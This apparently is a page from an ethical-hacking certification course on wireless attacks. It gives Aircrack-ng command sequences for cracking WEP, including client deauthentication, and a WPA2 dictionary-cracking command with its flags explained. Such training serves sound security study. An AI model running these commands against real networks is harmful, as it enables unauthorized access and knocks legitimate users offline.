3. Perform Wireless Attacks

As an ethical hacker and pen tester of an organization, you must test its wireless security, exploit WPA2 flaws, and crack the network’s access point keys.

Wifi Hacking Tutorial CEH

1. Crack WEP using Aircrack-ng

airmon-ng start wlan0
airodump-ng
airodump-ng –w "filename" -c "channel name"
aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
aireplay-ng -3 –b "bssid" -h "mac address"
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0
aircrack-ng -b "filename.cap"

2. Crack WEP using WifiPhisher

3. Crack WPA with FERN cracker

4. Crack WPA 2 with Aircrack

WPA2 is an upgrade to WPA; it includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), an AES-based encryption protocol with strong security. WPA2 has two modes of operation: WPA2-Personal and WPA2-Enterprise. Despite being stronger than both WEP and WPA, the WPA2 encryption method can also be cracked using various techniques and tools.

In this task, we will use the Aircrack-ng suite to crack a WPA2 network.

aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap
  • -a is the technique used to crack the handshake, 2=WPA technique.

  • -b refers to bssid; replace with the BSSID of the target router.

  • -w stands for wordlist; provide the path to a wordlist.

The result appears, showing the WPA handshake packet captured with airodump-ng. The target access point’s password is cracked and displayed in plain text next to the message KEY FOUND!, as shown in the screenshot.

Full tutorial

You can also use other tools such as hashcat (https://hashcat.net), Portable Penetrator (https://www.secpoint.com), WepCrackGui (https://sourceforge.net) to crack WEP/WPA/WPA2 encryption.

5. Create a Rogue access Point

CEH Hacking Full course

Last updated

Was this helpful?